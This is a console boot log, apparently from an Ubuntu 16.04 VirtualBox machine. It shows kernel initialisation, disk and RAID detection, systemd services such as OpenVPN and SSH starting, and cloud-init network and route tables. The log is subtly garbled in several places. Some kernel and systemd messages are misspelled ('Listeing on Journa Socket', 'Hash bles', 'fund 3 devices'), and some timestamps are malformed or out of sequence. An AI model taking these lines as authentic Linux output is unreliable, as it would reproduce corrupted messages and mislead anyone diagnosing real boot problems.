spinlock -[ 1.631600] x86: Booting SMP configuration: -[ 1.647273] .... node #0, CPUs: #1 -[ 1.649451] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 1.701518] mce: CPU supports 0 MCE banks -[ 1.713936] x86: Booted up 1 node, 2 CPUs -[ 1.734019] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 1.753343] devtmpfs: initialized -[ 1.775394] evm: security.selinux -[ 1.796166] evm: security.SMACK64 -[ 1.801879] evm: security.SMACK64EXEC -[ 1.813570] evm: security.SMACK64TRANSMUTE -[ 1.858928] evm: security.SMACK64MMAP -[ 1.864976] evm: security.ima -[ 1.865928] evm: security.capability -[ 1.880879] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 1.903667] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 1.906903] pinctrl core: initialized pinctrl subsystem -[ 1.943003] RTC time: 22:38:15, date: 01/25/21 -[ 1.945340] NET: Registered protocol family 16 -[ 1.970659] cpuidle: using governor ladder -[ 1.990066] cpuidle: using governor menu -[ 1.992022] PCCT header not found. -[ 1.992916] ACPI: bus type PCI registered -[ 2.025108] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 2.044490] PCI: Using configuration type 1 for base access -[ 2.069257] ACPI: Added _OSI(Module Device) -[ 2.076967] ACPI: Added _OSI(Processor Device) -[ 2.084793] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 2.085784] ACPI: Added _OSI(Processor Aggregator Device) -[ 2.158176] ACPI: Executed 1 blocks of module-level executable AML code -[ 2.171482] ACPI: Interpreter enabled -[ 2.177822] ACPI: (supports S0 S5) -[ 2.192840] ACPI: Using IOAPIC for interrupt routing -[ 2.205412] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 2.234202] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 2.235670] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 2.241894] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 2.243914] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 2.258366] PCI host bridge to bus 0000:00 -[ 2.268516] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 2.272324] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 2.307393] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 2.315822] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 2.336812] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 2.346880] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 2.362624] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 2.367468] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 2.409224] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 2.438102] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 2.449781] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 2.464641] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 2.466528] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 2.468653] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 2.470553] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 2.472433] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 2.481232] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 2.482558] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 2.500050] vgaarb: loaded -[ 2.500662] vgaarb: bridge control possible 0000:00:02.0 -[ 2.501906] SCSI subsystem initialized -[ 2.503321] ACPI: bus type USB registered -[ 2.504132] usbcore: registered new interface driver usbfs -[ 2.505150] usbcore: registered new interface driver hub -[ 2.506149] usbcore: registered new device driver usb -[ 2.512559] PCI: Using ACPI for IRQ routing -[ 2.524463] NetLabel: Initializing -[ 2.525407] NetLabel: domain hash size = 128 -[ 2.531647] NetLabel: protocols = UNLABELED CIPSOv4 -[ 2.533116] NetLabel: unlabeled traffic allowed by default -[ 2.545026] amd_nb: Cannot enumerate AMD northbridges -[ 2.551498] clocksource: Switched to clocksource kvm-clock -[ 2.560670] AppArmor: AppArmor Filesystem Enabled -[ 2.567174] pnp: PnP ACPI init -[ 2.568993] pnp: PnP ACPI: fund 3 devices -[ 2.72042] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 2.819537] NET: Registered protocol family 2 - -[ 2.822703] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 2.838964] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 2.843565] TCP: Hash bles configured (established 8192 bind 8192) -[ 3.006057] UDP hash table entris: 512 (order: 2, 16384 bytes) -[ 3.072219] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 3.074761] NET: Registered protocol family 1 -[ 3.076371] pci 0000:00:00.0: Limiting direct PCI/PCI transfers -[ 3.078595] pci 0000:00:01.0: Activating ISA DMA hang workarounds -[ 3.080984] Unpacking initramfs... - -[ 3.657824] Freeing initrd memory: 14880K -[ 3.661665] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 3.668162] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 3.673385] Scanning for low memory corruption every 60 seconds -[ 3.676080] audit: initializing netlink subsys (disabled) -[ 3.678466] audit: type=2000 audit(1611614301.334:1): initialized -[ 3.681511] Initialise system trusted keyring -[ 3.683407] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 3.687283] zbud: loaded -[ 3.689027] VFS: Disk quotas dquot_6.6.0 -[ 3.693322] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 3.695843] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 3.715310] fuse init (API version 7.23) -[ 3.718372] Key type big_key registered -[ 3.719305] Allocating IMA MOK and blacklist keyrings. -[ 3.741077] Key type asymmetric registered -[ 3.742116] Asymmetric key parser 'x509' registered -[ 3.743310] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 3.755570] io scheduler noop registered -[ 3.756576] io scheduler deadline registered (default) -[ 3.757794] io scheduler cfq registered -[ 3.758836] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 3.760155] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 3.768977] ACPI: AC Adapter [AC] (on-line) -[ 3.770038] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 3.773513] ACPI: Power Button [PWRF] -[ 3.774499] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 3.776363] ACPI: Sleep Button [SLPF] -[ 3.790978] ACPI: Battery Slot [BAT0] (battery present) -[ 3.793297] GHES: HEST is not enabled! -[ 3.798128] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 3.829741] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 3.862365] Linux agpgart interface v0.103 -[ 3.866286] loop: module loaded -[ 3.867462] scsi host0: ata_piix -[ 3.868284] scsi host1: ata_piix -[ 3.874986] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 3.911073] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 3.952852] libphy: Fixed MDIO Bus: probed -[ 3.969505] tun: Universal TUN/TAP device driver, 1.6 -[ 4.012299] tun: (C) 1999-2004 Max Krasnyansky -[ 4.035921] PPP generic driver version 2.4.2 -[ 4.041212] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 4.047178] ehci-pci: EHCI PCI platform driver -[ 4.051853] ehci-platform: EHCI generic platform driver -[ 4.056125] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 4.060749] ohci-pci: OHCI PCI platform driver -[ 4.063911] ohci-platform: OHCI generic platform driver -[ 4.067885] uhci_hcd: USB Universal Host Controller Interface driver -[ 4.073746] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 4.080614] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 4.084727] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 4.088150] mousedev: PS/2 mouse device common for all mice -[ 4.094250] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 4.100253] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 4.124981] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 4.129239] i2c /dev entries driver -[ 4.141398] device-mapper: uevent: version 1.0.3 -[ 4.144132] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 4.155375] ledtrig-cpu: registered to indicate activity on CPUs -[ 4.193671] NET: Registered protocol family 10 -[ 4.222679] NET: Registered protocol family 17 -[ 4.226936] Key type dns_resolver registered -[ 4.229036] registered taskstats version 1 -[ 4.232026] Loading compiled-in X.509 certificates -[ 4.236465] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 4.242804] zswap: loaded using pool lzo/zbud -[ 4.256590] Key type trusted registered -[ 4.266812] Key type encrypted registered -[ 4.268426] AppArmor: AppArmor sha1 policy hashing enabled -[ 4.270429] ima: No TPM chip found, activating TPM-bypass! -[ 4.273454] ima: Allocated hash algorithm: sha1 -[ 4.276771] evm: HMAC attrs: 0x1 -[ 4.282660] Magic number: 5:763:654 -[ 4.284316] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:17 UTC (1611614297) -[ 4.293190] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 4.297034] EDD information not available. -[ 4.309717] Freeing unused kernel memory: 1492K -[ 4.605083] Write protecting the kernel read-only data: 14336k -[ 4.612783] Freeing unused kernel memory: 1592K -[ 4.614742] Freeing unused kernel memory: 56K -Loading, please wait... -starting version 229[ 4.668933] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) - -[ 4.669532] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.669624] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.669647] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.669668] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.712423] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.720579] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.734759] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.734820] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.734990] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.965064] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 4.966537] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 4.980547] Fusion MPT base driver 3.04.20 -[ 4.981529] Copyright (c) 1999-2008 LSI Corporation -[ 4.996189] AVX2 version of gcm_enc/dec engaged. -[ 4.998241] AES CTR mode by8 optimization enabled -[ 5.000085] Fusion MPT SPI Host driver 3.04.20 -[ 5.187487] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 5.350953] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 5.352195] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 6.064140] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:cd:22:e5 -[ 6.065578] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 6.087725] mptbase: ioc0: Initiating bringup -[ 6.090947] e1000 0000:00:03.0 enp0s3: renamed from eth0 -[ 6.127946] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 6.179726] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 6.357293] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 6.508204] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.510098] scsi target2:0:0: Beginning Domain Validation -[ 6.512097] scsi target2:0:0: Domain Validation skipping write tests -[ 6.516019] scsi target2:0:0: Ending Domain Validation -[ 6.517117] scsi target2:0:0: asynchronous -[ 6.524595] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.558910] scsi target2:0:1: Beginning Domain Validation -[ 6.574919] scsi target2:0:1: Domain Validation skipping write tests -[ 6.598098] scsi target2:0:1: Ending Domain Validation -[ 6.606854] scsi target2:0:1: asynchronous -[ 6.658528] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 6.673028] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 6.724701] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 6.726466] sd 2:0:1:0: [sdb] Write Protect is off -[ 6.734983] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 6.736727] sd 2:0:0:0: [sda] Write Protect is off -[ 6.738332] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 6.738475] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 6.738476] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 6.762227] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 6.778565] sda: sda1 -[ 6.783068] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 6.790771] sd 2:0:0:0: [sda] Attached SCSI disk -Begin: Loading essential drivers ... [ 8.489260] md: linear personality registered for level -1 -[ 8.510500] md: multipath personality registered for level -4 -[ 8.538907] md: raid0 personality registered for level 0 -[ 8.569553] md: raid1 personality registered for level 1 -[ 8.652003] raid6: sse2x1 gen() 6929 MB/s -[ 8.719842] raid6: sse2x1 xor() 4959 MB/s -[ 8.787923] raid6: sse2x2 gen() 7147 MB/s -[ 8.864096] raid6: sse2x2 xor() 6113 MB/s -[ 8.935659] raid6: sse2x4 gen() 11041 MB/s -[ 9.022129] raid6: sse2x4 xor() 6975 MB/s -[ 9.092226] raid6: avx2x1 gen() 5771 MB/s -[ 9.170162] raid6: avx2x2 gen() 6787 MB/s -[ 9.239584] raid6: avx2x4 gen() 9183 MB/s -[ 9.241110] raid6: using algorithm sse2x4 gen() 11041 MB/s -[ 9.265002] raid6: .... xor() 6975 MB/s, rmw enabled -[ 9.276196] raid6: using avx2x2 recovery algorithm -[ 9.331475] xor: automatically using best checksumming function: -[ 9.373023] avx : 12101.000 MB/sec -[ 9.398950] async_tx: api initialized (async) -[ 9.522268] md: raid6 personality registered for level 6 -[ 9.540312] md: raid5 personality registered for level 5 -[ 9.541357] md: raid4 personality registered for level 4 -[ 9.613607] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 9.861891] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 10.004405] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 10.104098] EXT4-fs (sda1): write access will be enabled during recovery -[ 10.227155] EXT4-fs (sda1): recovery complete -[ 10.229042] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 10.432037] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 10.439865] systemd[1]: Detected virtualization oracle. -[ 10.445626] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 10.464614] systemd[1]: Set hostname to . -[ 1.010610] random: nonblocking pool is initialized - -[ 11.244886] systemd[1]: Listeing on Journa Socket. -[ OK ] Listening on Journal Socket. -[ 11.676148] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 11.679931] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 11.69787] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 12.171978] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 12.191384] systemd[1]: Reached target User and Grup Name Looups. -[ OK ] Reached target User and Group Name Lookups. -[ 12.522628] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 12.547793] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 12.555425] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 12.584900] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 12.633575] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 12.663810] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 12.764094] systemd[1]: Starting Remount Root and Kernel File Systems... - Starting Remount Root and Kernel File S[ 12.796234] ip_tables: (C) 2000-2006 Netfilter Core Team -ystems... -[ 12.809699] EXT4-fs (sda1): re-mounted. Opts: (null) -[ 12.817859] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 12.915122] nf_conntrack version 0.5.0 (7935 buckets, 31740 max) -[ 12.917406] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 12.963948] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 13.000856] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 13.011394] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 13.024334] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 13.058490] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 13.148635] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 13.183197] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Req[ 13.286729] ip6_tables: (C) 2000-2006 Netfilter Core Team -uests to Wall Directory Watch. -[ 13.287496] Loading iSCSI transport class v2.0-870. -[ 13.321677] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 13.614552] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... -[ 13.616164] iscsi: registered transport (tcp) - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 13.920682] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 14.073687] systemd[1]: Created slice system-openvpn.slice. -[ OK ] Created slice system-openvpn.slice. -[ 14.136693] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 14.176739] systemd[1]: Reached target Slices. -[ OK ] Reached target Slices. -[ 14.197004] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 14.257898] systemd[1]: Starting Journal Service... -[ 14.288012] iscsi: registered transport (iser) - Starting Journal Service... -[ 14.352645] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 14.381496] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 14.406532] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 14.435642] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 14.476178] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 14.522159] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 14.548070] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK ] Started Set console keymap. -[ OK ] Started Remount Root and Kernel File Systems. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ OK ] Started Load Kernel Modules. -[ OK ] Started LVM2 metadata daemon. - Mounting FUSE Control File System... - Starting Apply Kernel Variables... - Starting Create Static Device Nodes in /dev... - Starting Load/Save Random Seed... - Starting udev Coldplug all Devices... - Starting Flush Journal to Persistent Storage... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Nameserver information manager. -[ OK ] Started Apply Kernel Variables. -[ OK ] Started Load/Save Random Seed. -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started Create Static Device Nodes in /dev. - Starting udev Kernel Device Manager... -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting Initial cloud-init job (pre-networking)... - Starting Set console font and keymap... - Starting Tell Plymouth To Write Out Runtime Data... - Starting LSB: AppArmor initialization... - Starting Create Volatile Files and Directories... -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started Create Volatile Files and Directories. - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started Uncomplicated firewall. -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Found device /dev/ttyS0. - Starting Load AppArmor profiles managed internally by snapd... -[ OK ] Started Set console font and keymap. -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. -[ OK ] Created slice system-getty.slice. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ 17.985108] cloud-init[541]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:32 +0000. Up 17.12 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s8. -[ OK ] Started ifup for enp0s3. - Starting Raise network interfaces... -[ OK ] Started Raise network interfaces. -[ OK ] Reached target Network. - Starting Initial cloud-init job (metadata service crawler)... -[ 19.569143] cloud-init[1173]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:34 +0000. Up 19.23 seconds. -[ 19.571605] cloud-init[1173]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ -[ 19.577831] cloud-init[1173]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.583549] cloud-init[1173]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 19.640517] [cloud-init OK [1173]: ] ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+Started Initial cloud-init job (metadata service crawler). - -[ 19.641124] cloud-init[1173]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff |[ - OK ] Reached target Cloud-config availability. -[ 19.712654] [ OK ] Reached target Network is Online. -cloud-init[1173]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 19.732310] cloud-init[1173]: ci-info: | enp0s8 | True | 192.168.2.2 | 255.255.255.0 | global | 08:00:27:cd:22:e5 | -[ 19.734175] cloud-init[1173]: ci-info: | enp0s8 | True | fe80::a00:27ff:fecd:22e5/64 | . | link | 08:00:27:cd:22:e5 | -[ 19.797938] Starting iSCSI initiator daemon (iscsid)... -[ OK ] Reached target System Initialization. -cloud-init[1173]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 19.983229] cloud-init[1173]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 19.983907] cloud-init[1173]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.984040] cloud-init[1173]: ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ -[ 19.984126] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.984190] cloud-init[1173]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 19.984254] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.984315] cloud-init[1173]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 19.984388] cloud-init[1173]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 19.984579] cloud-init[1173]: ci-info: | 2 | 192.168.0.0 | 192.168.2.254 | 255.255.0.0 | enp0s8 | UG | -[ 19.984640] cloud-init[1173]: ci-info: | 3 | 192.168.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 19.984697] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.986002] cloud-init[1173]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 19.986447] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.986510] cloud-init[1173]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 19.986578] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.986635] cloud-init[1173]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | -[ 19.986694] cloud-init[1173]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | -[ 19.986759] cloud-init[1173]: ci-info: | 4 | ff00::/8 | :: | enp0s8 | U | -[ 19.986818] cloud-init[1173]: ci-info: | 5 | ff00::/8 | :: | enp0s3 | U | -[ 19.986879] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ -[ OK ] Started Message of the Day. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Listening on PC/SC Smart Card Daemon Activation Socket. -[ OK ] Started Daily apt download activities. -[ OK ] Started Daily apt upgrade and clean activities. -[ OK ] Listening on ACPID Listen Socket. -[ OK ] Started ACPI Events Check. -[ OK ] Reached target Paths. -[ OK ] Started Daily Cleanup of Temporary Directories. -[ OK ] Reached target Timers. - Starting LXD - unix socket. -[ OK ] Listening on D-Bus System Message Bus Socket. - Starting Socket activation for snappy daemon. -[ OK ] Listening on LXD - unix socket. -[ OK ] Listening on Socket activation for snappy daemon. -[ OK ] Started iSCSI initiator daemon (iscsid). - Starting Login to default iSCSI targets... -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. -[ OK ] Started ACPI event daemon. -[ OK ] Started Deferred execution scheduler. - Starting System Logging Service... - Starting Accounts Service... - Starting Snap Daemon... - Starting Virtualbox guest utils... -[ OK ] Started FUSE filesystem for LXC. - Starting OpenVPN service... - Starting Login Service... - Starting /etc/rc.local Compatibility... - Starting LSB: MD monitoring daemon... - Starting LXD - container startup/shutdown... - Starting OpenBSD Secure Shell server... - Starting LSB: Record successful boot for GRUB... - Starting OpenVPN connection to server... -[ OK ] Started D-Bus System Message Bus. -[ OK ] Started Regular background program processing daemon. -[ OK ] Started System Logging Service. -[ OK ] Started OpenVPN service. -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started OpenVPN connection to server. -[ OK ] Started OpenBSD Secure Shell server. -[ OK ] Started Login Service. -[ OK ] Started Unattended Upgrades Shutdown. - Starting Authenticate and Authorize Users to Run Privileged Tasks... -[ OK ] Started Snap Daemon. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started Login to default iSCSI targets. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Accounts Service. -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting Permit User Sessions... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting LSB: automatic crash report generation... - Starting LSB: daemon to balance interrupts for SMP systems... - Starting Wait until snapd is fully seeded... -[ OK ] Started Permit User Sessions. -[ OK ] Started Wait until snapd is fully seeded. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started LSB: automatic crash report generation. - Starting Apply the settings specified in cloud-config... - Starting Terminate Plymouth Boot Screen... - Starting Hold until boot process finishes up... -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started Hold until boot process finishes up. - Starting Set console scheme... -[ OK ] Started Getty on tty1. 